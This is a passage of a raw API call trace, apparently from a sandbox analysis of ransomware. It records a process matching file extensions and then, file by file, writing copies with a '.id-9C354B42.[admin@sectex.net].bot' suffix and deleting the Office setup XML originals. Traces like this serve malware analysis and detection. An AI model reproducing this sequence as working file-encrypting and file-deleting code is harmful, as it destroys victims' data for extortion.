	[0037.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.914] lstrlenW (lpString=".doc") returned 4
	[0037.914] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0037.914] lstrlenW (lpString=".docx") returned 5
	[0037.914] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0037.914] lstrlenW (lpString=".pdf") returned 4
	[0037.914] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0037.914] lstrlenW (lpString=".xls") returned 4
	[0037.914] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0037.914] lstrlenW (lpString=".xlsx") returned 5
	[0037.914] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0037.914] lstrlenW (lpString=".ppt") returned 4
	[0037.914] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0037.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.914] lstrlenW (lpString=".zip") returned 4
	[0037.914] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0037.914] lstrlenW (lpString=".rar") returned 4
	[0037.914] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0037.914] lstrlenW (lpString=".bz2") returned 4
	[0037.914] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0037.914] lstrlenW (lpString=".7z") returned 3
	[0037.914] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0037.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.914] lstrlenW (lpString=".dbf") returned 4
	[0037.914] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0037.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.915] lstrlenW (lpString=".1cd") returned 4
	[0037.915] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0037.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.915] lstrlenW (lpString=".jpg") returned 4
	[0037.915] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0037.915] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0037.915] lstrlenW (lpString="Office32MUI.XML") returned 15
	[0037.915] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0038.516] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1383) returned 1
	[0038.516] CloseHandle (hObject=0x1cc) returned 1
	[0038.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 0x20
	[0038.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0038.517] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.517] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0039.085] GetLastError () returned 0x0
	[0039.085] ReadFile (in: hFile=0x1cc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x567, lpOverlapped=0x0) returned 1
	[0039.086] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x570, lpOverlapped=0x0) returned 1
	[0039.087] ReadFile (in: hFile=0x1cc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.087] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0039.087] SetEndOfFile (hFile=0x190) returned 1
	[0039.087] CloseHandle (hObject=0x190) returned 1
	[0039.088] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.088] SetEndOfFile (hFile=0x1cc) returned 1
	[0039.089] CloseHandle (hObject=0x1cc) returned 1
	[0039.089] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.089] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 1
	[0039.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.090] lstrlenW (lpString=".doc") returned 4
	[0039.090] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.090] lstrlenW (lpString=".docx") returned 5
	[0039.090] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0039.090] lstrlenW (lpString=".pdf") returned 4
	[0039.090] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.090] lstrlenW (lpString=".xls") returned 4
	[0039.090] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.090] lstrlenW (lpString=".xlsx") returned 5
	[0039.090] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0039.090] lstrlenW (lpString=".ppt") returned 4
	[0039.090] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.090] lstrlenW (lpString=".zip") returned 4
	[0039.090] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.090] lstrlenW (lpString=".rar") returned 4
	[0039.090] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.090] lstrlenW (lpString=".bz2") returned 4
	[0039.090] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.090] lstrlenW (lpString=".7z") returned 3
	[0039.090] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.090] lstrlenW (lpString=".dbf") returned 4
	[0039.090] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.090] lstrlenW (lpString=".1cd") returned 4
	[0039.090] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.090] lstrlenW (lpString=".jpg") returned 4
	[0039.091] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.091] lstrlenW (lpString=".doc") returned 4
	[0039.091] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.091] lstrlenW (lpString=".docx") returned 5
	[0039.091] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0039.091] lstrlenW (lpString=".pdf") returned 4
	[0039.091] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.091] lstrlenW (lpString=".xls") returned 4
	[0039.091] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.091] lstrlenW (lpString=".xlsx") returned 5
	[0039.091] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0039.091] lstrlenW (lpString=".ppt") returned 4
	[0039.091] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.091] lstrlenW (lpString=".zip") returned 4
	[0039.091] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.091] lstrlenW (lpString=".rar") returned 4
	[0039.091] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.091] lstrlenW (lpString=".bz2") returned 4
	[0039.091] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.091] lstrlenW (lpString=".7z") returned 3
	[0039.091] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.091] lstrlenW (lpString=".dbf") returned 4
	[0039.091] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.091] lstrlenW (lpString=".1cd") returned 4
	[0039.091] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110
	[0039.091] lstrlenW (lpString=".jpg") returned 4
	[0039.091] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.092] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.092] lstrlenW (lpString="Proof.XML") returned 9
	[0039.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0039.092] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1347) returned 1
	[0039.092] CloseHandle (hObject=0x1cc) returned 1
	[0039.092] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 0x20
	[0039.092] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0039.092] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.092] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0039.093] GetLastError () returned 0x0
	[0039.093] ReadFile (in: hFile=0x1cc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x543, lpOverlapped=0x0) returned 1
	[0039.094] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x550, lpOverlapped=0x0) returned 1
	[0039.095] ReadFile (in: hFile=0x1cc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.095] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0039.095] SetEndOfFile (hFile=0x190) returned 1
	[0039.095] CloseHandle (hObject=0x190) returned 1
	[0039.096] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.096] SetEndOfFile (hFile=0x1cc) returned 1
	[0039.097] CloseHandle (hObject=0x1cc) returned 1
	[0039.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.097] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 1
	[0039.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.097] lstrlenW (lpString=".doc") returned 4
	[0039.097] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.097] lstrlenW (lpString=".docx") returned 5
	[0039.097] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1
	[0039.097] lstrlenW (lpString=".pdf") returned 4
	[0039.097] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.097] lstrlenW (lpString=".xls") returned 4
	[0039.097] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.097] lstrlenW (lpString=".xlsx") returned 5
	[0039.097] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1
	[0039.097] lstrlenW (lpString=".ppt") returned 4
	[0039.097] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.097] lstrlenW (lpString=".zip") returned 4
	[0039.098] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.098] lstrlenW (lpString=".rar") returned 4
	[0039.098] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.098] lstrlenW (lpString=".bz2") returned 4
	[0039.098] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.098] lstrlenW (lpString=".7z") returned 3
	[0039.098] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.098] lstrlenW (lpString=".dbf") returned 4
	[0039.098] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.098] lstrlenW (lpString=".1cd") returned 4
	[0039.098] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.098] lstrlenW (lpString=".jpg") returned 4
	[0039.098] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.098] lstrlenW (lpString=".doc") returned 4
	[0039.098] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.098] lstrlenW (lpString=".docx") returned 5
	[0039.098] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1
	[0039.098] lstrlenW (lpString=".pdf") returned 4
	[0039.098] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.098] lstrlenW (lpString=".xls") returned 4
	[0039.098] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.098] lstrlenW (lpString=".xlsx") returned 5
	[0039.098] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1
	[0039.098] lstrlenW (lpString=".ppt") returned 4
	[0039.098] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.098] lstrlenW (lpString=".zip") returned 4
	[0039.098] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.098] lstrlenW (lpString=".rar") returned 4
	[0039.099] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.099] lstrlenW (lpString=".bz2") returned 4
	[0039.099] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.099] lstrlenW (lpString=".7z") returned 3
	[0039.099] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.099] lstrlenW (lpString=".dbf") returned 4
	[0039.099] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.099] lstrlenW (lpString=".1cd") returned 4
	[0039.099] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98
	[0039.099] lstrlenW (lpString=".jpg") returned 4
	[0039.099] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.099] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.099] lstrlenW (lpString="Proof.XML") returned 9
	[0039.099] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0039.103] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1457) returned 1
	[0039.103] CloseHandle (hObject=0x1cc) returned 1
	[0039.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 0x20
	[0039.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0039.103] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.103] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0039.103] GetLastError () returned 0x0
	[0039.103] ReadFile (in: hFile=0x1cc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x5b1, lpOverlapped=0x0) returned 1
	[0039.105] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x5c0, lpOverlapped=0x0) returned 1
	[0039.106] ReadFile (in: hFile=0x1cc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.106] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0039.106] SetEndOfFile (hFile=0x190) returned 1
	[0039.106] CloseHandle (hObject=0x190) returned 1
	[0039.109] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.109] SetEndOfFile (hFile=0x1cc) returned 1
	[0039.110] CloseHandle (hObject=0x1cc) returned 1
	[0039.110] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.110] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 1
	[0039.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.110] lstrlenW (lpString=".doc") returned 4
	[0039.110] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.110] lstrlenW (lpString=".docx") returned 5
	[0039.110] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1
	[0039.110] lstrlenW (lpString=".pdf") returned 4
	[0039.110] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.110] lstrlenW (lpString=".xls") returned 4
	[0039.110] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.110] lstrlenW (lpString=".xlsx") returned 5
	[0039.110] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1
	[0039.110] lstrlenW (lpString=".ppt") returned 4
	[0039.110] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98
	[0039.110] lstrlenW (lpString=".zip") returned 4
	[0039.110] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
